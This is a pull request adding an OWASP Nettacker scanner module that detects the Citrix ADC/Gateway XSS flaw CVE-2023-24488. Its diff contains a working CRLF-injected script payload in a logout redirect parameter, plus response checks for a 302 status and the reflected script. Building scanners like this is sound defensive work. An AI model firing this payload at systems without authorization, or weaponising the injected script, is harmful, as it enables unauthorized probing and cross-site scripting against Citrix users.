### PR TITLE
New module citrix_cve_2023_24488_vuln

### DIFF
--- a/modules/vuln/citrix_cve_2023_24488.yaml
+++ b/modules/vuln/citrix_cve_2023_24488.yaml
@@ -1,0 +1,48 @@
+info:
+  name: citrix_cve_2023_24488_vuln
+  author: OWASP Nettacker Team
+  severity: 6
+  description: CVE-2023-24488 - XSS Vulnerability in Citrix Application Delivery Controller and Citrix Gateway
+  reference: 
+    - https://support.citrix.com/article/CTX477714
+    - https://blog.assetnote.io/2023/06/29/binary-reversing-citrix-xss/
+    - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
+  profiles:
+    - vuln
+    - vulnerability
+    - http
+    - medium_severity
+    - cve
+    - citrix
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              paths:
+                - 'oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(%27vulnerable%27)</script>%27'
+              schema:
+                - "https"
+              ports:
+                - 443
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "302"
+              reverse: false
+            content:
+              regex: "alert\\('vulnerable'\\)"
+              reverse: false


### PR DESCRIPTION
feature #694 - new module to detect Citrix XSS and open redirect CVE-2023-24488 for which a POC was published on 29-Jun-2023


#### Checklist
- [X] I have followed the [Contributor Guidelines](https://github.com/OWASP/Nettacker/wiki/Developers#contribution-guidelines).
- [X] The code has been thoroughly tested in my local development environment with flake8 and pylint.
- [X] The code is Python 3 compatible.
- [X] The code follows the PEP8 styling guidelines with 4 spaces indentation.
- [X] This Pull Request relates to only one issue or only one feature
- [X] I have referenced the corresponding issue number in my commit message
- [X] I have added the relevant documentation.
- [X] My branch is up-to-date with the Upstream master branch.

#### Changes proposed in this pull request

A new module to detect Citrix XSS CVE-2023-24488

#### Your development environment
- OS: `MacOS`
- OS Version: `12.6`
- Python Version: `3.11`
